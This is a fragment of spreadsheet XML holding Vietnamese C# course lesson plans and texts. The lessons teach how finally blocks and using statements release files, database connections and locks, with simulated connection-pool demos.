        // Đảm bảo tệp luôn được đóng dù có lỗi hay không
        if (reader != null)
        {
            reader.Dispose();
            Console.WriteLine("Đã giải phóng tài nguyên StreamReader.");
        }
    }
}
Lưu ý quan trọng: Trước khi gọi Dispose(), chúng ta luôn kiểm tra reader != null. Điều này tránh lỗi NullReferenceException nếu ngoại lệ xảy ra ngay tại thời điểm khởi tạo đối tượng StreamReader.
Sự khác biệt giữa Dispose() và Close()
Trong C#, bạn sẽ thường xuyên bắt gặp cả hai phương thức Close() và Dispose(). Về cơ bản, Dispose() là một phần của interface IDisposable, được thiết kế để giải phóng tài nguyên một cách tường minh. Trong hầu hết các trường hợp, Close() thực chất sẽ gọi nội bộ đến Dispose().
Việc tuân thủ mô hình try-finally đảm bảo rằng dù chương trình của bạn có gặp lỗi logic nghiêm trọng hay lỗi dữ liệu đầu vào, các thao tác dọn dẹp vẫn được thực thi triệt để. Điều này giúp ứng dụng hoạt động ổn định trong thời gian dài (uptime cao) mà không bị rò rỉ tài nguyên (resource leakage).
Hiện đại hóa với khối using (Statement)
Mặc dù finally là công cụ mạnh mẽ và nền tảng, C# cung cấp một cú pháp "đường cú pháp" (syntactic sugar) gọi là using để tự động hóa hoàn toàn việc gọi Dispose(). Khi bạn sử dụng using, trình biên dịch sẽ tự động sinh ra khối try-finally cho bạn dưới nền.
So sánh hai cách viết:
Cách 1: Sử dụng finally thủ công (đã biết)
StreamReader reader = new StreamReader("data.txt");
try { /* Xử lý file */ }
finally { reader?.Dispose(); }
Cách 2: Sử dụng cú pháp using hiện đại
using (StreamReader reader = new StreamReader("data.txt"))
{
    string content = reader.ReadToEnd();
    // Không cần finally, tài nguyên tự động được giải phóng tại đây
}
Mặc dù using rất tiện lợi, việc hiểu rõ cơ chế finally vẫn là kiến thức bắt buộc. Có những trường hợp phức tạp (ví dụ: cần xử lý nhiều tài nguyên khác nhau hoặc thực hiện logic dọn dẹp tùy chỉnh không nằm trong Dispose) mà chỉ có cấu trúc try-catch-finally tường minh mới giải quyết được.
Best Practices khi làm việc với tài nguyên
Ưu tiên dùng using: Nếu đối tượng triển khai IDisposable, hãy luôn ưu tiên dùng using để code ngắn gọn và dễ đọc.
Dọn dẹp triệt để: Trong khối finally, hãy cẩn thận để không gây ra thêm lỗi mới. Nếu logic dọn dẹp của bạn có thể ném ra ngoại lệ, hãy đặt nó trong một khối try-catch lồng nhau bên trong finally.
Thứ tự ưu tiên: Luôn giải phóng tài nguyên theo thứ tự ngược lại với thứ tự khởi tạo. Nếu bạn mở kết nối A rồi đến kết nối B, hãy đóng B trước rồi đến A.
Việc nắm vững cách dùng finally không chỉ là kỹ thuật xử lý lỗi, mà còn là thước đo tư duy về quản lý bộ nhớ và tính chuyên nghiệp trong thiết kế ứng dụng C# của một lập trình viên.</t>
        </is>
      </c>
      <c r="W21" s="22" t="inlineStr">
        <is>
          <t># Sử dụng finally để đảm bảo tài nguyên được giải phóng
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích **rò rỉ tài nguyên** (resource leak) là gì và vì sao nó nguy hiểm.
- Nhận ra lỗi thường gặp: đặt `Close()` ngay sau dòng có thể ném lỗi.
- Viết mã đóng tệp an toàn bằng `finally`.
- Nhắc đến `using` như cách viết gọn hơn cho cùng mục đích.
- So sánh hai cách viết bằng hoạt động mô phỏng: có và không có `finally`.
## Tài nguyên cần được giải phóng
Một số đối tượng giữ tài nguyên của hệ thống, như tệp, kết nối cơ sở dữ liệu, kết nối mạng. Sau khi dùng xong, ta phải **trả lại** chúng. Nếu không, chúng bị giữ mãi và gây ra **rò rỉ tài nguyên**:
- Tệp vẫn bị khóa, chương trình khác không mở được.
- Bộ nhớ và kết nối bị chiếm dần.
- Chương trình chậm đi hoặc hết tài nguyên sau một thời gian chạy.
## Lỗi thường gặp: Close() nằm trong try
Giả sử tệp `data.txt` có ba dòng: `10`, `abc`, `30`. Mã dưới đây đọc hai dòng đầu và đóng tệp ở cuối `try`:
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        var r = new StreamReader("data.txt");
        try
        {
            int a = int.Parse(r.ReadLine());
            int b = int.Parse(r.ReadLine());   // dòng 2 là "abc": ném FormatException
            r.Close();                         // bị bỏ qua
        }
        catch (FormatException)
        {
            Console.WriteLine("Dữ liệu sai");
        }
    }
}
```
Dòng thứ hai là `"abc"`, nên `int.Parse` ném `FormatException`. Chương trình nhảy thẳng xuống `catch`, và `r.Close()` **không bao giờ chạy**. Tệp vẫn mở.
## Cách đúng: đặt Close() trong finally
Đưa lệnh đóng tệp vào `finally`, nơi luôn được chạy:
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        var r = new StreamReader("data.txt");
        try
        {
            int a = int.Parse(r.ReadLine());
            int b = int.Parse(r.ReadLine());
        }
        catch (FormatException)
        {
            Console.WriteLine("Dữ liệu sai");
        }
        finally
        {
            r.Close();   // luôn chạy
        }
    }
}
// Dữ liệu sai
```
Dù `try` chạy trọn vẹn hay ném lỗi giữa chừng, `r.Close()` vẫn chạy. Cách viết gọn hơn dùng `using` sẽ được học ở các bài sau.
## Hoạt động: Rò rỉ tệp và finally
Mô phỏng dưới đây có hai cột cùng đọc `data.txt` (nội dung: 10, abc, 30). Cột trái là **Không finally**, cột phải là **Có finally**. Hãy bấm **Bước tiếp** để chạy từng dòng ở cả hai cột:
- Mở tab **Lỗi khi đang đọc**. Ban đầu ở cả hai cột, đèn `data.txt` sáng "Đang mở". Dòng 1 là "10", `Parse` thành công nên `a = 10`.
- Dòng 2 là "abc", `int.Parse` ném `FormatException` (thẻ lỗi đỏ) ở cả hai cột, và `catch` in "Dữ liệu sai".
- **Cột trái (Không finally):** lệnh `Close()` bị bỏ qua (chặng bị gạch). Đèn chuyển đỏ "Vẫn mở (rò rỉ)". Rời khối mà tệp vẫn mở.
- **Cột phải (Có finally):** `finally` chạy và gọi `r.Close()`. Đèn chuyển xanh "Đóng", dù có lỗi giữa chừng.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-co-ban/khoi-finally-va-cac-truong-hop-dac-biet/su-dung-finally-de-dam-bao-tai-nguyen-duoc-giai-phong/" title="Finally giải phóng tài nguyên" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: lệnh giải phóng tài nguyên đặt sau dòng có thể lỗi sẽ bị bỏ qua khi có lỗi. Đặt nó trong `finally` thì tài nguyên luôn được trả lại.
## Thực hành tốt
- Đặt lệnh giải phóng (`Close()`, `Dispose()`) trong `finally`, không đặt ở cuối `try`.
- Với đối tượng có `Dispose()` (`IDisposable`), ưu tiên `using` vì ngắn gọn và không thể quên.
- Giữ `finally` ngắn và ít rủi ro, để nó không ném thêm lỗi.
## Nhớ gì khi viết mã đóng tài nguyên?
- **Khai báo biến trước `try`.** Nhờ vậy `finally` nhìn thấy biến để gọi `Close()`. Nếu khai báo biến bên trong `try`, `finally` sẽ không truy cập được.
- **Mở tài nguyên trước `try`.** Nếu việc mở thất bại thì chưa có gì để đóng.
- **Đừng tin vào "chắc không lỗi".** Dữ liệu từ tệp, mạng hay người dùng luôn có thể sai. Hãy giả định lỗi có thể xảy ra ở bất kỳ dòng nào trong `try`.
## Tóm tắt
- Tài nguyên như tệp và kết nối phải được trả lại sau khi dùng.
- Không trả lại gây ra rò rỉ tài nguyên.
- Lệnh `Close()` đặt cuối `try` sẽ bị bỏ qua khi có lỗi phía trước.
- Đặt `Close()` trong `finally` để nó chạy trong mọi trường hợp.
- `using` là cách gọn hơn cho cùng mục đích.</t>
        </is>
      </c>
    </row>
    <row r="22" ht="409.6" customHeight="1" s="18">
      <c r="A22" s="10" t="n">
        <v>22</v>
      </c>
      <c r="B22" s="10" t="inlineStr">
        <is>
          <t>3. Xử lý lỗi và Ngoại lệ (Exception Handling) Nâng cao</t>
        </is>
      </c>
      <c r="C22" s="10" t="inlineStr">
        <is>
          <t>Khối finally và Đảm bảo Giải phóng Tài nguyên</t>
        </is>
      </c>
      <c r="D22" s="10" t="inlineStr">
        <is>
          <t>finally trong thực tế: Đóng kết nối, giải phóng tài nguyên</t>
        </is>
      </c>
      <c r="E22" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F22" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G22" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H22" s="10" t="inlineStr">
        <is>
          <t>Thấy hậu quả tích lũy khi quên giải phóng tài nguyên: số kết nối bị bỏ ngỏ tăng dần sau mỗi lần lỗi.</t>
        </is>
      </c>
      <c r="I22" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: Không finally | Có finally</t>
        </is>
      </c>
      <c r="J22" s="10" t="inlineStr">
        <is>
          <t>Mỗi cột có 'bể kết nối' gồm 5 ô; ô đang dùng màu xanh, ô bị bỏ ngỏ màu đỏ. Bộ đếm 'Kết nối đang mở' lớn ở trên.</t>
        </is>
      </c>
      <c r="K22" s="10" t="inlineStr">
        <is>
          <t>H08, H22</t>
        </is>
      </c>
      <c r="L22" s="10" t="inlineStr">
        <is>
          <t>Gọi hàm 3 lần, cả 3 lần đều lỗi</t>
        </is>
      </c>
      <c r="M22" s="10" t="inlineStr">
        <is>
          <t>Mỗi lần gọi LoadData(): mở kết nối → truy vấn → đóng kết nối.
Lần 1: truy vấn lỗi. Trái: Close bị bỏ qua, đếm = 1. Phải: finally đóng, đếm = 0.
Lần 2: trái đếm = 2; phải vẫn 0.
Lần 3: trái đếm = 3; phải vẫn 0.
Thêm bước: lần 6 bên trái vượt 5 ô → báo 'Hết kết nối' (minh họa giới hạn bể kết nối).
Xong: so sánh bộ đếm.</t>
        </is>
      </c>
      <c r="N22" s="10" t="inlineStr">
        <is>
          <t>Bể kết nối giả lập 5 ô</t>
        </is>
      </c>
      <c r="O22" s="10" t="inlineStr">
        <is>
          <t>Rò rỉ tài nguyên không gây lỗi ngay mà tích lũy dần cho tới khi hệ thống cạn tài nguyên.</t>
        </is>
      </c>
      <c r="P22" s="10" t="inlineStr">
        <is>
          <t>Kết nối là giả lập (không dùng thư viện cơ sở dữ liệu thật); con số giới hạn bể chỉ để minh họa.</t>
        </is>
      </c>
      <c r="Q22" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/khoi-finally-va-dam-bao-giai-phong-tai-nguyen/finally-trong-thuc-te-dong-ket-noi-giai-phong-tai-nguyen/index.html</t>
        </is>
      </c>
      <c r="R22" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/khoi-finally-va-dam-bao-giai-phong-tai-nguyen/finally-trong-thuc-te-dong-ket-noi-giai-phong-tai-nguyen/</t>
        </is>
      </c>
      <c r="S22" s="10" t="n"/>
      <c r="T22" s="12" t="n"/>
      <c r="U22" s="12" t="n"/>
      <c r="V22" s="21" t="inlineStr">
        <is>
          <t>Vai trò thực tiễn của khối finally trong quản lý tài nguyên hệ thống
Trong các bài học trước, chúng ta đã tìm hiểu về cú pháp cơ bản của try-catch-finally. Nếu khối catch giúp chúng ta khôi phục ứng dụng sau lỗi, thì finally đóng vai trò là "chốt chặn an toàn" cuối cùng. Trong các ứng dụng thực tế, đặc biệt là khi làm việc với các hệ thống bên ngoài như cơ sở dữ liệu hoặc dịch vụ mạng, việc giải phóng tài nguyên không chỉ là một yêu cầu kỹ thuật mà còn là yếu tố sống còn để đảm bảo hiệu năng và tính ổn định của ứng dụng.
Khi nào chúng ta thực sự cần đến finally?
Mặc dù using statement là lựa chọn tối ưu cho các đối tượng triển khai IDisposable, vẫn tồn tại nhiều tình huống mà finally là công cụ duy nhất giải quyết được vấn đề. Bạn sẽ cần đến finally khi:
Thao tác với các tài nguyên không tuân thủ hoàn toàn giao thức IDisposable.
Cần đảm bảo các trạng thái của hệ thống được khôi phục (ví dụ: tắt đèn báo, giải phóng khóa (lock) trong đa luồng).
Thực hiện dọn dẹp các tài nguyên chia sẻ không thuộc quyền sở hữu trực tiếp của đối tượng đang xử lý.
Kỹ thuật quản lý kết nối cơ sở dữ liệu
Một kịch bản phổ biến là quản lý kết nối đến cơ sở dữ liệu (Database Connection). Nếu một lỗi xảy ra trong quá trình thực thi câu lệnh SQL, kết nối vẫn có thể đang mở. Nếu không đóng kết nối, "pool" kết nối của hệ thống sẽ nhanh chóng bị cạn kiệt, dẫn đến lỗi "Connection Timeout" cho các người dùng sau đó.
Hãy xem xét ví dụ dưới đây về cách xử lý an toàn:
public void UpdateUserStatus(string connectionString, int userId)
{
    SqlConnection connection = new SqlConnection(connectionString);
    try
    {
        connection.Open();
        // Thực hiện lệnh UPDATE phức tạp
        SqlCommand command = new SqlCommand("UPDATE Users SET Active = 1 WHERE Id = @Id", connection);
        command.Parameters.AddWithValue("@Id", userId);
        command.ExecuteNonQuery();
    }
    catch (SqlException ex)
    {
        // Ghi log lỗi chi tiết tại đây
        Console.WriteLine($"Lỗi truy cập dữ liệu: {ex.Message}");
    }
    finally
    {
        // Luôn kiểm tra trạng thái trước khi đóng để tránh ngoại lệ phụ
        if (connection != null &amp;&amp; connection.State == ConnectionState.Open)
        {
            connection.Close();
            Console.WriteLine("Kết nối đã được đóng an toàn.");
        }
    }
}
Đảm bảo tính nhất quán trong lập trình đa luồng
Trong môi trường đa luồng (multithreading), việc sử dụng lock để bảo vệ tài nguyên là cần thiết. Tuy nhiên, nếu mã bên trong khối lock gây ra ngoại lệ mà không được bắt kịp thời, chương trình có thể rơi vào trạng thái "deadlock" (khóa chết) mãi mãi. Khối finally ở đây đóng vai trò đảm bảo rằng bất kể kết quả của khối mã bên trong là gì, khóa sẽ luôn được nhả ra để các luồng khác có thể tiếp tục.
Lưu ý quan trọng: Đừng bao giờ đặt mã giải phóng tài nguyên trực tiếp sau khối catch mà không có finally. Nếu khối try thực thi thành công, đoạn mã sau catch sẽ chạy, nhưng nếu ngoại lệ xảy ra và bị bắt, luồng thực thi có thể bị rẽ nhánh khác. finally đảm bảo tính tập trung cho việc dọn dẹp.
Những cạm bẫy cần tránh khi dùng finally
Mặc dù finally rất mạnh mẽ, việc lạm dụng hoặc thực hiện sai cách có thể gây ra những hậu quả không mong muốn:
Tuyệt đối không ném ngoại lệ mới trong finally: Nếu finally ném ra một ngoại lệ, nó sẽ đè lên ngoại lệ gốc (nếu có) đang được chờ xử lý, khiến việc chẩn đoán nguyên nhân gốc rễ của lỗi trở nên vô cùng khó khăn.
Tránh các tác vụ tốn kém: Đừng thực hiện các thao tác nặng (như truy vấn lại DB hoặc gọi API) bên trong finally. Nếu chính thao tác dọn dẹp bị treo, toàn bộ ứng dụng sẽ bị ảnh hưởng.
Luôn kiểm tra Null: Khi giải phóng các tài nguyên như kết nối mạng hay handle, hãy luôn thực hiện kiểm tra null để tránh gây ra NullReferenceException ngay trong quá trình dọn dẹp.
Việc làm chủ khối finally giúp bạn kiểm soát chặt chẽ vòng đời của tài nguyên trong những trường hợp mà cấu trúc using không thể đáp ứng. Đây chính là ranh giới giữa một lập trình viên chỉ biết viết code chạy được và một kỹ sư phần mềm tạo ra những ứng dụng có độ bền cao, không rò rỉ tài nguyên.</t>
        </is>
      </c>
      <c r="W22" s="22" t="inlineStr">
        <is>
          <t># finally trong thực tế: Đóng kết nối, giải phóng tài nguyên
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích vì sao quên đóng kết nối là lỗi nguy hiểm dù không báo lỗi ngay.
- Nhận ra rò rỉ tài nguyên tích lũy dần cho đến khi hệ thống hết chỗ.
- Viết hàm mở kết nối và đóng nó trong `finally`.
- Nhận ra cạm bẫy khi dùng `finally`.
- Quan sát bể kết nối đầy dần hoặc luôn trống bằng hoạt động mô phỏng.
## Vì sao finally quan trọng trong thực tế?
Trong ứng dụng thật, nhiều tài nguyên có **số lượng giới hạn**: kết nối cơ sở dữ liệu, kết nối mạng, tệp đang mở, khóa (lock). Hệ thống thường giữ một "bể" (pool) kết nối với số ô cố định. Mỗi lần mở là chiếm một ô, và chỉ khi đóng thì ô mới được trả lại.
Nếu hàm mở kết nối rồi gặp lỗi trước khi kịp đóng, ô đó bị **bỏ ngỏ**. Mỗi lần như vậy chỉ mất một ô nên không ai để ý. Nhưng lỗi lặp lại nhiều lần thì các ô cạn dần. Đến một lúc, chương trình không mở được kết nối nào nữa dù mỗi lỗi riêng lẻ rất nhỏ.
## Quên đóng kết nối
Dưới đây là hàm `LoadData()` mở kết nối, truy vấn rồi đóng. Mã minh họa dùng lớp kết nối giả lập, giới hạn 5 ô để dễ quan sát:
```csharp
static void LoadData()
{
    conn.Open();
    conn.Query();    // luôn ném lỗi trong ví dụ này
    conn.Close();    // bị bỏ qua khi Query lỗi
}
```
Khi `Query()` ném lỗi, dòng `conn.Close()` không chạy. Nếu nơi gọi bắt và nuốt lỗi bằng `catch (Exception) { }` thì càng khó biết vì không có thông báo nào xuất hiện.
## Cách đúng: Close() trong finally
```csharp
static void LoadData()
{
    conn.Open();
    try
    {
        conn.Query();
    }
    finally
    {
        conn.Close();   // luôn chạy, dù Query có lỗi hay không
    }
}
```
Hai điểm cần nhớ:
- `conn.Open()` đặt **trước** `try`. Nếu `Open()` thất bại thì chưa có gì để đóng.
- `Close()` đặt trong `finally` để chạy trong mọi trường hợp.
## Hoạt động: Gọi hàm 3 lần, cả 3 lần đều lỗi
Mô phỏng dưới đây gọi `LoadData()` nhiều lần trong một vòng `for`. Mỗi lần `Query()` đều lỗi. Bên trên có bộ đếm "Kết nối đang mở" và bể 5 ô. Cột trái là **Không finally**, cột phải là **Có finally**. Hãy bấm **Bước tiếp** để chạy từng dòng ở cả hai cột:
- Mở tab **Gọi hàm 3 lần, cả 3 lần đều lỗi**. Lần 1: `Open()` mở kết nối thứ nhất, bộ đếm là 1 và ô sáng "Đang dùng".
- **Cột trái (Không finally):** `Query()` lỗi, `Close()` bị bỏ qua, ô chuyển đỏ "Bỏ ngỏ". Lần 2 và 3 lặp lại: bộ đếm lên 2, rồi 3, và không có thông báo lỗi nào vì `catch` đã nuốt lỗi. Đến lần 5 bộ đếm là 5 và bể đầy. Lần 6, `conn.Open()` không mở được nữa, thẻ đỏ "Hết kết nối" hiện ra.
- **Cột phải (Có finally):** cũng lỗi nhưng `finally` đóng kết nối ngay, bộ đếm về 0 sau mỗi lần. Cả 5 ô vẫn xanh và lần 6 mở và đóng bình thường.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/khoi-finally-va-dam-bao-giai-phong-tai-nguyen/finally-trong-thuc-te-dong-ket-noi-giai-phong-tai-nguyen/" title="Quên đóng kết nối" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: rò rỉ tài nguyên không gây lỗi ngay mà tích lũy dần cho đến khi hệ thống cạn tài nguyên. Đặt `Close()` trong `finally` thì dù lỗi bao nhiêu lần, không kết nối nào bị bỏ ngỏ. Kết nối ở đây là giả lập, giới hạn 5 chỉ để minh họa.
## Cạm bẫy khi dùng finally
- **Ném lỗi trong `finally`:** lỗi mới có thể che mất lỗi gốc. Giữ `finally` đơn giản.
- **Đóng một đối tượng chưa được tạo:** nếu biến vẫn là `null`, hãy kiểm tra trước khi gọi `Close()`.
- **Đặt `return` trong `finally`:** C# không cho phép thoát khỏi `finally` bằng `return`.
- **Quên `finally` ở nơi có lỗi bị nuốt:** `catch` rỗng làm rò rỉ khó phát hiện hơn.
Với đối tượng có `Dispose()`, câu lệnh `using` ở bài sau sẽ tự viết `try/finally` giúp bạn.
## Các tài nguyên thường gặp trong thực tế
- **Kết nối cơ sở dữ liệu:** số kết nối đồng thời bị giới hạn.
- **Tệp đang mở:** tệp bị khóa, người khác hoặc chương trình khác không ghi được.
- **Kết nối mạng và socket:** mỗi kết nối chiếm cổng và bộ nhớ.
- **Khóa (lock) trong lập trình đa luồng:** quên nhả khóa làm các luồng khác chờ mãi. Đặt lệnh nhả khóa trong `finally` để tránh tình trạng này.
## Tóm tắt
- Kết nối, tệp và khóa là tài nguyên có hạn, phải được trả lại sau khi dùng.
- Quên đóng khi có lỗi làm tài nguyên bị rò rỉ, và hệ thống cạn dần.
- Mở tài nguyên trước `try`, đóng nó trong `finally`.
- Với `finally`, bộ đếm kết nối về 0 sau mỗi lần, dù lỗi bao nhiêu lần.
- Giữ `finally` ngắn gọn và không để nó ném thêm lỗi.</t>
        </is>
      </c>
    </row>
    <row r="23" ht="409.6" customHeight="1" s="18">
      <c r="A23" s="10" t="n">
        <v>23</v>
      </c>
      <c r="B23" s="10" t="inlineStr">
        <is>
          <t>3. Xử lý lỗi và Ngoại lệ (Exception Handling) Nâng cao</t>
        </is>
      </c>
      <c r="C23" s="10" t="inlineStr">
        <is>
          <t>Khối finally và Đảm bảo Giải phóng Tài nguyên</t>
        </is>
      </c>
      <c r="D23" s="10" t="inlineStr">
        <is>
          <t>using statement như một cách thay thế cho finally (cho IDisposable)</t>
        </is>
      </c>
      <c r="E23" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F23" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G23" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H23" s="10" t="inlineStr">
        <is>
          <t>Thấy using tự gọi Dispose khi rời khối (kể cả khi có lỗi), tương đương try/finally viết tay.</t>
        </is>
      </c>
      <c r="I23" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: try/finally viết tay | using</t>
        </is>
      </c>
      <c r="J23" s="10" t="inlineStr">
        <is>
          <t>Biểu tượng tài nguyên với trạng thái Đang mở / Đã Dispose. Mũi tên chú thích 'trình biên dịch dịch using thành try/finally' nối hai cột. Đường đi tô theo tình huống.</t>
        </is>
      </c>
      <c r="K23" s="10" t="inlineStr">
        <is>
          <t>H08, H04</t>
        </is>
      </c>
      <c r="L23" s="10" t="inlineStr">
        <is>
          <t>Không lỗi | Có lỗi giữa chừng | Khai báo using (C# 8)</t>
        </is>
      </c>
      <c r="M23" s="10" t="inlineStr">
        <is>
          <t>Không lỗi: hai cột mở StreamReader, đọc, rời khối → cả hai gọi Dispose (trái do finally, phải do using).
Có lỗi: lỗi khi đọc → trái nhảy vào finally gọi Dispose; phải cũng Dispose tự động trước khi lỗi lan ra ngoài.
Khai báo using: using var reader = new StreamReader(...); Dispose chạy khi hết phạm vi (cuối hàm).
Bước cuối: hai cột cùng kết quả, cột phải ngắn gọn hơn.</t>
        </is>
      </c>
      <c r="N23" s="10" t="inlineStr">
        <is>
          <t>data.txt</t>
        </is>
      </c>
      <c r="O23" s="10" t="inlineStr">
        <is>
          <t>Với đối tượng IDisposable (tệp, kết nối...), ưu tiên dùng using thay cho try/finally viết tay.</t>
        </is>
      </c>
      <c r="P23" s="10" t="inlineStr">
        <is>
          <t>Khai báo 'using var' có từ C# 8; đối tượng Dispose khi ra khỏi phạm vi chứa nó.</t>
        </is>
      </c>
      <c r="Q23" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/khoi-finally-va-dam-bao-giai-phong-tai-nguyen/using-statement-nhu-mot-cach-thay-the-cho-finally-cho-idisposable/index.html</t>
        </is>
      </c>
      <c r="R23" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/xu-ly-loi-va-ngoai-le-exception-handling-nang-cao/khoi-finally-va-dam-bao-giai-phong-tai-nguyen/using-statement-nhu-mot-cach-thay-the-cho-finally-cho-idisposable/</t>
        </is>
      </c>
      <c r="S23" s="10" t="n"/>
      <c r="T23" s="12" t="n"/>
      <c r="U23" s="12" t="n"/>
      <c r="V23" s="21" t="inlineStr">
        <is>
          <t>Giới thiệu về Interface IDisposable và Phương thức Dispose()
Trong lập trình C#, chúng ta thường xuyên làm việc với các tài nguyên đòi hỏi phải được giải phóng một cách tường minh sau khi sử dụng. Các tài nguyên này có thể là:
Tài nguyên không được quản lý (unmanaged resources): Ví dụ như file handles (tay cầm tập tin), network sockets (ổ cắm mạng), database connections (kết nối cơ sở dữ liệu), hoặc các đối tượng đồ họa được cấp phát bởi hệ điều hành.
Tài nguyên được quản lý nhưng cần giải phóng sớm: Ví dụ như các luồng dữ liệu (streams) hoặc các đối tượng sử dụng nhiều bộ nhớ mà bạn muốn giải phóng ngay lập tức thay vì chờ Garbage Collector (GC) của .NET.
Mặc dù Garbage Collector (GC) của .NET Framework tự động quản lý và giải phóng bộ nhớ cho các đối tượng được quản lý, nó không thể xử lý các tài nguyên không được quản lý một cách hiệu quả. Nếu không được giải phóng đúng cách, các tài nguyên này có thể dẫn đến rò rỉ tài nguyên (resource leaks), gây ra hiệu suất kém hoặc thậm chí là treo ứng dụng.
Để giải quyết vấn đề này, C# cung cấp interface IDisposable.
IDisposable là một interface đơn giản chỉ chứa một phương thức duy nhất: Dispose().
Phương thức Dispose() được thiết kế để chứa logic giải phóng các tài nguyên không được quản lý hoặc thực hiện các thao tác dọn dẹp cần thiết khác. Khi một lớp triển khai IDisposable, nó báo hiệu rằng các đối tượng của lớp đó cần được "dọn dẹp" một cách tường minh sau khi sử dụng.
Ví dụ, khi bạn mở một file để đọc hoặc ghi, bạn sẽ tạo ra một đối tượng StreamReader hoặc FileStream. Các đối tượng này sẽ giữ một "tay cầm" (handle) đến file đó trên hệ điều hành. Nếu bạn không đóng file đúng cách, tay cầm này sẽ không được giải phóng, và các ứng dụng khác có thể không truy cập được file đó.
Thông thường, để đảm bảo Dispose() được gọi, chúng ta sẽ sử dụng khối try-finally như bạn đã học trong bài "Vai trò của khối finally".
StreamReader reader = null;
try
{
    reader = new StreamReader("du_lieu.txt");
    string line = reader.ReadLine();
    Console.WriteLine(line);
}
catch (Exception ex)
{
    Console.WriteLine($"Lỗi: {ex.Message}");
}
finally
{
    if (reader != null)
    {
        reader.Dispose(); // Đảm bảo tài nguyên được giải phóng
    }
}
Mặc dù cách tiếp cận này hiệu quả, nó khá dài dòng và dễ mắc lỗi nếu bạn quên kiểm tra null hoặc quên gọi Dispose(). Đây chính là lúc using statement phát huy tác dụng.
using statement: Tự động gọi Dispose() một cách ngắn gọn
using statement trong C# là một cấu trúc cú pháp đặc biệt được thiết kế để làm cho việc sử dụng các đối tượng IDisposable trở nên dễ dàng và an toàn hơn. Nó cung cấp một cách ngắn gọn để đảm bảo phương thức Dispose() của một đối tượng luôn được gọi, ngay cả khi có ngoại lệ xảy ra trong khối mã.
Khi bạn khai báo một đối tượng trong một using statement, C# sẽ tự động tạo ra một khối try-finally ẩn. Phương thức Dispose() của đối tượng đó sẽ được gọi trong khối finally ẩn này ngay khi đối tượng ra khỏi phạm vi của khối using.
Cú pháp cơ bản của using statement như sau:
using (KieuDoiTuong bien = new KieuDoiTuong())
{
    // Sử dụng biến ở đây
} // Khi ra khỏi khối này, bien.Dispose() sẽ tự động được gọi
Ví dụ: Hãy xem lại ví dụ đọc file ở trên, nhưng lần này sử dụng using statement:
try
{
    using (StreamReader reader = new StreamReader("du_lieu.txt"))
    {
        string line = reader.ReadLine();
        Console.WriteLine(line);
    } // reader.Dispose() tự động được gọi ở đây
}
catch (Exception ex)
{
    Console.WriteLine($"Lỗi: {ex.Message}");
}
Bạn có thể thấy, đoạn mã trở nên gọn gàng hơn đáng kể. Không cần phải khai báo reader bên ngoài khối try, không cần kiểm tra null và không cần gọi Dispose() một cách tường minh trong khối finally. Tất cả những điều đó được using statement xử lý tự động.
C# 8.0 trở lên còn giới thiệu using declaration (khai báo using), cho phép bạn khai báo một biến using mà không cần một khối riêng biệt. Đối tượng sẽ được Dispose() khi nó ra khỏi phạm vi của phương thức hoặc khối mã hiện tại.
public void DocVaInDuLieu(string filePath)
{
    try
    {
        using StreamReader reader = new StreamReader(filePath); // using declaration
        string line = reader.ReadLine();
        Console.WriteLine(line);
    } // reader.Dispose() tự động được gọi khi phương thức kết thúc
    catch (Exception ex)
    {
        Console.WriteLine($"Lỗi khi đọc file: {ex.Message}");
    }
}
Điểm mấu chốt là using statement hoạt động như một khối finally được chuyên biệt hóa để đảm bảo việc giải phóng tài nguyên cho các đối tượng IDisposable, làm cho mã của bạn sạch sẽ, dễ đọc và đáng tin cậy hơn.
So sánh ưu nhược điểm của using statement và khối finally
using statement và khối finally đều có mục đích đảm bảo một đoạn mã được thực thi, nhưng chúng được sử dụng trong các ngữ cảnh khác nhau và có những ưu nhược điểm riêng.
using statement
Ưu điểm:
Ngắn gọn và dễ đọc: Giảm đáng kể lượng mã boilerplate cần thiết để quản lý tài nguyên IDisposable.
Đảm bảo giải phóng tài nguyên: Tự động gọi Dispose() ngay cả khi có ngoại lệ xảy ra trong khối using.
An toàn hơn: Loại bỏ nguy cơ quên gọi Dispose() hoặc xử lý sai trường hợp null cho đối tượng.
Phạm vi rõ ràng: Tài nguyên được giải phóng ngay khi ra khỏi phạm vi của khối using, giúp quản lý tài nguyên hiệu quả hơn.
Hỗ trợ nhiều tài nguyên: Có thể sử dụng nhiều using statement lồng nhau hoặc khai báo nhiều tài nguyên trong một using statement duy nhất (từ C# 8.0).
Nhược điểm:
Chỉ dùng cho IDisposable:using statement chỉ có thể được sử dụng với các đối tượng triển khai interface IDisposable. Nó không thể dùng để thực hiện các công việc dọn dẹp không liên quan đến IDisposable.
